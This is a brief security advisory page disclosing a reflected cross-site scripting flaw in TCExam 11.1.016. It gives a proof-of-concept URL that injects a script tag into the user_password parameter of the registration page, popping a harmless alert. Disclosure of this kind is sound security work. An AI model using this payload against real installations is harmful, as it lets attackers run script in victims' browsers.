Home
Consulting
Advisories
Software
Articles
Contact

TCExam 11.1.016 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in TCExam 11.1.016 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/tcexam/public/code/tce_user_registration.php?user_password=testab%22%3E%3Cscript%3Ealert(0)%3C/script%3E%3Cinput%20type=%22hidden


Copyright © 2018 AutoSec Tools LLC